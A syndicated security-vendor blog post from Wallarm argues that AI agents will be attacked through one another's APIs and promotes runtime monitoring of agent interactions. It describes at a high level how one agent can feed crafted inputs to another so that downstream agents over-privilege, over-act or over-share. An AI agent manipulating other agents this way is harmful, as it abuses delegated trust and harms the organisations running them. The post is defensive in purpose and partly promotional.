Agent-to-Agent Attacks Are Coming: What API Security Teaches Us About Securing AI Systems


AI systems are no longer just isolated models responding to human prompts.

[…Keep reading]

Monitoring Legitimate Bot Traffic is Now a Cybersecurity Requirement 

Monitoring Legitimate Bot Traffic is Now a Cybersecurity Requirement 


AI systems are no longer just isolated models responding to human prompts. 
In modern production environments, they are increasingly chained together – delegating tasks, calling tools, and coordinating decisions with limited or no human oversight. Almost all that communication happens through APIs. 
This shift offers enormous productivity benefits. But it has also complicated security. Because as soon as systems can talk to each other, they can be attacked through each other. And it’s just a matter of time before we see the first attack of this type. That makes API security more important than ever. 
We’ve Seen This Pattern Before: APIs as the Hidden Attack Surface 
Although this might seem new and scary, the agentic AI security dilemma isn’t entirely novel. 
Once upon a time, we as an industry treated APIs as safe by default. We assumed they were internal, trusted, and invisible to users. Security teams focused on web apps and perimeter defenses while APIs multiplied behind the scenes. 
But then that assumption collapsed. APIs became exposed to the internet, business-critical, and deeply embedded in workflows. Attackers no longer needed to sniff out zero-days; they merely needed valid credentials and an understanding of how the system worked. Ultimately, the business underestimated the speed of API proliferation and the creativity of attackers in abusing APIs. 
Data shows just how acute this problem has become. According to the 2026 API ThreatStats report, in 2025, APIs accounted for 11,053 of 67,058 published security bulletins, or 17% of all reported vulnerabilities. Nearly half of the newly added CISA Known Exploited Vulnerabilities (KEVs) in 2025 (106 of 245, or 43%) were API-related. Among AI-related Known Exploited Vulnerabilities (KEVs), the overlap is the same: 21 of 58 exploited AI vulnerabilities (36%) involve APIs. As AI matures, its risks don’t shift elsewhere; they still come through APIs. These threats soared nearly 400% year over year.
The key takeaway is this: AI agents now occupy the same conceptual space APIs did a decade ago – powerful, under-governed, and widely misunderstood. 
What Is an Agent-to-Agent Attack?
Earlier in this blog, we mentioned that cybercriminals can attack AI systems – specifically agentic AI systems – through each other. This is what’s known as an agent-to-agent attack. Let’s define that briefly before we move forward. 
An agent-to-agent attack occurs when one AI system manipulates another through legitimate interfaces to produce unintended or harmful outcomes. There is no exploit in the traditional sense. Every request is authenticated, every response is valid, and every system behaves “as designed.”
One agent may pass carefully crafted inputs to another agent’s API. Another may trigger actions that cause downstream agents to over-privilege, over-act, or over-share. In more complex environments, attack chains can emerge across multiple agents, each making locally reasonable decisions that compound into systemic failure. Put simply, there is no single point of compromise, and damage results from interaction. 
Why Traditional AI Security Thinking Falls Short 
Most AI security discussions today focus on model safety, prompt injection, training data poisoning, and alignment. Although these are real problems, they assume the model is the target of the attack. And that doesn’t reflect how attackers actually operate. 
Attackers don’t always target models in isolation; they can also target systems, workflows, and the seams between components. They focus on how decisions propagate across tools, services, and agents, rather than on how a single model generates an output. 
What’s missing is runtime interaction security. That means understanding and securing agent behavior post-deployment, how agents interact with each other and with other tools, and how abuse manifests across systems. When security controls end at the prompt or the model, the most valuable layer – the interaction layer – remains unprotected. 
This is the same mistake organizations made with APIs: securing individual components while ignoring how they could be abused together. Agentic systems make that mistake more costly.
API Security Lessons AI Security Cannot Ignore
The mistakes the industry made with API security have already shown how systems fail when trust and autonomy outpace visibility. Even fully authenticated API are routinely abused through authorization gaps and business logic flaws, without triggering traditional defenses.
Agentic AI systems inherit the same problems – only with greater speed, autonomy, and blast radius. As such, API security has taught us some valuable lessons:

Authentication is not enough. Modern API breaches increasingly involve valid identities performing harmful actions. Legitimacy doesn’t necessarily equal safety. 
Authorization logic fails silently, especially when systems act on behalf of others. Delegated authority is where intent disappears, and damage accumulates. 
Business logic is the real attack surface. Attackers don’t just exploit bugs; they exploit workflows, state transitions, and assumptions about order and trust. 
Attackers chain behaviors, not vulnerabilities. Small, valid actions compound into a major impact when stitched together across systems. 

Why Agentic Systems Make Abuse Harder to See
Agentic systems make these failures harder to detect than in traditional environments. 
Agent behavior is non-deterministic, context-dependent, and often opaque by design. The same request can produce different actions depending on state, history, or inferred intent. 
AI agents can generate novel request patterns, adapt to defenses, and mask malicious intent as reasonable behavior. Locally, each action appears justified – even when the global outcome is harmful. 
The implication is straightforward: static rules and pre-defined policies will fail in agentic environments. Abuse must be detected through behavioral analysis over time, not in a single request. 
Rethinking Defense: From Securing Models to Securing Interactions 
To truly secure AI systems, we need to change our thinking. AI security must expand beyond models and prompts to include: 

Monitoring agent-to-agent traffic
Understanding normal versus abusive interaction patterns
Detecting intent through behavior, not signatures

This mirrors the evolution of modern API security, which moved from vulnerability scanning to runtime abuse protection. 
That same philosophy underpins Wallarm’s approach to detection: observing live API and agent traffic, establishing baseline interaction patterns, and identifying behavioral anomalies that emerge only across sequences of requests, not single calls.
Instead of looking for known payloads or malformed inputs, detection focuses on signals such as unexpected call ordering, privilege escalation, unusual delegation paths, and interaction chains that deviate from normal workflows. 
This approach also aligns with the goals of the A2AS initiative, to which Wallarm is a key contributor. A2AS focuses on securing agent interactions at runtime by making agent behavior observable, attributable, and enforceable – treating agent-to-agent communication as a first-class security boundary rather than an implicit trust channel. 
What Security Leaders Should Do Now
So, what do you need to do? 
Security leaders should act before agent standards mature and before the first high-profile incident forces the issue. Start by treating AI agents as API clients and servers, not special cases. Then, you should extend API threat models to cover: 

Autonomous behavior
Delegated authority
Chained decision-making

Most importantly, assume agent-to-agent abuse will occur. Waiting for best practices or formal standards will mean you’re just reacting, not actually defending. Invest now in visibility and detection at the interaction layer, where intent and abuse emerge. 
The First Agent-to-Agent Breach Will Look Boring
The first agent-to-agent attack will not look like science fiction. It will look like valid requests, correct responses, and systems doing exactly what they were told. Nothing will obviously break. Logs will look clean. By the time it’s noticed, the damage will already be done. 
The future of AI security will not be won at the model level – but at the interface level.
To explore how agent-to-agent interactions can be secured at runtime, learn more about the A2AS initiative at a2as.org. 
To see how these principles are applied in real-world environments, request a demo and see Wallarm in action, securing live API and agent traffic.
The post Agent-to-Agent Attacks Are Coming: What API Security Teaches Us About Securing AI Systems appeared first on Wallarm.

*** This is a Security Bloggers Network syndicated blog from Wallarm authored by Tim Erlin. Read the original post at: https://lab.wallarm.com/agent-to-agent-attacks-api-security-ai-systems/

About Author

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.